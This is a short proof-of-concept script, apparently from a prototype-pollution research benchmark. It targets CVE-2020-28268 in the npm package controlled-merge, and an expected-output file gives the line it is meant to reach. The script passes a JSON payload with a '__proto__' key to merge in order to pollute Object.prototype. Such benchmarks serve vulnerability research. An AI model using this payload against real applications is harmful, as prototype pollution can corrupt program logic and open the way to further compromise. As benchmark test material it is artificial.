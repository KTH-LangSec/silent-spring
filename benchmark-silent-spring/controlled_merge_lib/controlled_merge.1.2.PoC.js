//https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28268
const merge = require("controlled-merge");

Object.prototype._polluted = 1;
const obj = merge(
  {},
  JSON.parse('{ "__proto__": { "polluted": "yes" } }'),
  true
);
