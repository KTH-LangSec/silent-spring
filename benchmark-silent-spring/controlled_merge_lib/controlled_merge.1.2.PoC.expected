node_modules/controlled-merge/index.js:30:16